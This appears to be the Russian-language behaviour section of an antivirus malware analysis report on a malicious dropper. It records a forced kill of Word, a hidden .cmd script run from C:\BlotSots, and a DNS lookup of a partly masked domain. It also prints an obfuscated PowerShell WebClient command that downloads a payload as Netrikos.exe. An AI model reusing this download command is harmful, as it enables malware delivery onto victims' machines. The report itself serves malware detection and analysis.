Техническая информация
- '<SYSTEM32>\taskkill.exe' /IM "winword.exe" /F
- C:\blotsots\hertuggttrfrrdfey.cmd
- C:\blotsots\hertuggttrfrrdfey.cmd
- http://al###sheild.com/metalf.php
- DNS ASK al###sheild.com
- ClassName: '' WindowName: ''
- '<SYSTEM32>\cmd.exe' /c ""C:\BlotSots\HErtuGGttrfRRDfey.cmd" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""C:\BlotSots\HErtuGGttrfRRDfey.cmd" "
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://al###sheild.com/metalf.php', 'C:\BlotSots\Netrikos.exe')
- '<SYSTEM32>\timeout.exe' /T 10